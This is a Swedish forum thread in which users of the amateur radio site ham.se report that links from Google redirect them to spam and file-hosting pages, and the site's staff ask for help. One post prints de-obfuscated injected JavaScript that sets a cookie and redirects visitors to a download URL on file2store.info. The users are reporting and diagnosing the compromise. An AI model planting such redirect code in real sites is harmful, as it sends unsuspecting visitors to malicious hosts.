Ham.se utsatt för hackerattack

Om man inte lyckats rensa bort javaskriptet från servern så kan det betyda att den fortfarande har någon säkerhetslucka som gör att den blir infekterad igen.

Den nuvarande koden verkar ganska beskedlig men det finns ju risk att det planteras något
mera illvillligt skript på servern.
 
Så här koden ut som ham.se skickar ut efter att jag "packat" upp den.


Code:
function ipbcc(_0x601cx2, _0x601cx3) {
    var _0x601cx4 = new Date();
    _0x601cx4['setTime'](_0x601cx4['getTime']() + 86400000);
    var _0x601cx5 = '; expires=' + _0x601cx4['toGMTString']();
    document['cookie'] = _0x601cx2 + '=' + _0x601cx3 + _0x601cx5 + '; path=/'
};
ipbcc('vbsp', '1');
document['location'] = 'http://file2store.info/download.php?id=' + vbsp;
 
Personligen känner jag mig inte så till freds med att "hänga" på ett forum med säkerhetshål. Nu har det gått 1,5 månad utan någon respons om planer på att göra något mer åt detta.

Det kanske är dags att hitta ett nytt forum? Jag såg att ESR hade en ny hemsida och kanske dess forum kan bli ett ham.se-alternativ.

Eric
 
Någon som kan hjälpa till med problemet?

Någon som kan vara teknisk konsult inom området.

Hör av er till mig: tommy (AT) bjornstrom.se

Vi måste stänga forumet om det anses osäkert och ingen vet hur "datastore"
intrånget går till.

/ Tommy
 
Någon som kan hjälpa till med problemet?

Någon som kan vara teknisk konsult inom området.

Hör av er till mig: tommy (AT) bjornstrom.se

Vi måste stänga forumet om det anses osäkert och ingen vet hur "datastore"
intrånget går till.

/ Tommy

Hej Tommy, hur gick det, fick ni stopp på eländet? Själv har jag inte märkt av dessa problem men har efter inläggen här låtit bli att klicka på länkar som google hittat och som leder till ham.se. Är problemet löst så man kan använda de länkar man får fram via google eller ska man avstå?

Hoppas problemet är löst.

// Janne
 
Jag tror man har lyckats åtgärda problemet, försökte gå via google träffar men nu blir det ingen redirect utan man kommer till rätt sida på www.ham.se

/L
 
Hackat igen?

Det verkar som skadlig kod tagit sig in på ham.se
Söker jag på artiklar på google och klickar på en länk som pekar på ham.se så kommer jag till http //tinyurl4.info/43e20abf

Detta verkar endast ske via google i samband med firefox. Testat både på jobbet och hemma med samma resultat. Jag får inte problemet med Internet Explorer.

......
Kanske något för Admin att undersöka närmare.
......
Idag gjorde jag en sökning på Google, och fick resultat som gick till HAM.se.
När jag klickade på länken kom det upp reklam av den mest påträngande sorten. Man blir irriterad över att besväras av sådant man inte frågat efter.
Jag använder Firefox som web-läsare.
 
Idag gjorde jag en sökning på Google, och fick resultat som gick till HAM.se.
När jag klickade på länken kom det upp reklam av den mest påträngande sorten. Man blir irriterad över att besväras av sådant man inte frågat efter.
Jag använder Firefox som web-läsare.
Idag gjorde jag återigen en sökning som gick till ham.se.
Jag hamnade i stället på
MyFilestore.com - Your File Hosting
 
Hamnar alltid på MyFilestore.com - Your Free File Hosting när jag klickar på en länk från Google.
Då får man backa tillbaka till Google o klicka igen så funkar det.
Observera att det bara händer om det var "längesen" jag besökte ham.se

Samma problem i Ubuntu med Firefox som i Androidmobilen
 
Den som använder Google kan räkna med att hamna vart som helst. Google äger dig och du har själv medgivet det. - Tyvärr en baksida av härligheten..

/Sven.
 
Mitt antivirusprogram reagerade när jag klickade på en googlelänk till ham.se.
 

Attachments

  • ham.png
    ham.png
    9,7 KB · Views: 51
Det här har pågått länge. Jag har inte kollat nu, men tidigare har det varit tydligt att det är ham.se som är infekterat.

Eric SA5BKE
 
Förhoppningsvis kan forumet uppgraderas snart. Mer info kommer så snart jag vet mer.
 
Back
Top